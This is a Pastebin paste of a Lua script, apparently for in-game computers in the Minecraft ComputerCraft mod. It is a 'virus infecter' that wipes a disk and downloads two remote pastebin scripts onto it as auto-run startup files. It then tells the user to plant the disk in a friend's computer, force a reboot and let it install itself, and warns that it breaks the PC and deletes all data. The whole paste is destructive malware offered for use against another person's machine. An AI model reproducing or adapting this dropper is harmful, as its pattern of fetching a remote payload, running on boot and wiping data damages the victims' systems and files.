Advertisement
Guest User

pcdestroyer

a guest
Apr 30th, 2017
50
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Lua 1.36 KB | None | 0 0
  1. shell.run("clear")
  2. print("Please insert your disk you want the virus infecter to be installed on in 5 Seconds")
  3. os.sleep(1)
  4. print("5")
  5. os.sleep(1)
  6. print("4")
  7. os.sleep(1)
  8. print("3")
  9. os.sleep(1)
  10. print("2")
  11. os.sleep("1")
  12. print("1")
  13. os.sleep(3)
  14. print("Downloading everything now onto your disk")
  15. shell.run("label set top PC_Schrotter")
  16. shell.run("label set front PC_Schrotter")
  17. shell.run("label set back PC_Schrotter")
  18. shell.run("label set bottom PC_Schrotter")
  19. shell.run("label set right PC_Schrotter")
  20. shell.run("label set left PC_Schrotter")
  21. shell.run("delete disk")
  22. shell.run("pastebin get 4FvNAeMn /disk/startup ")
  23. shell.run("pastebin get blSHzgvd /disk/pcstartup")
  24. os.sleep(3)
  25. shell.run("clear")
  26. print("Succesfully installed the Virus to your disk.")
  27. os.sleep(1)
  28. print("Now all you need to do is.")
  29. os.sleep(1)
  30. print("Insert this disk into your friends Disk Drive next to their PC.")
  31. os.sleep(1)
  32. print("And while insert their PC hold CTRL + S.")
  33. os.sleep(1)
  34. print("This will force Shutdown their PC.")
  35. os.sleep(1)
  36. print("Then start it again and it installs itself.")
  37. os.sleep(1)
  38. print("But use it with caution it will break the PC so it wont normaly start again and deletes all data.")
  39. os.sleep(1)
  40. print("You cant fix your PC after an full infection without an Disk")
  41. os.sleep(1)
  42. print("Dont Reboot your PC now or it will Infect your PC")
  43. os.sleep(1)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement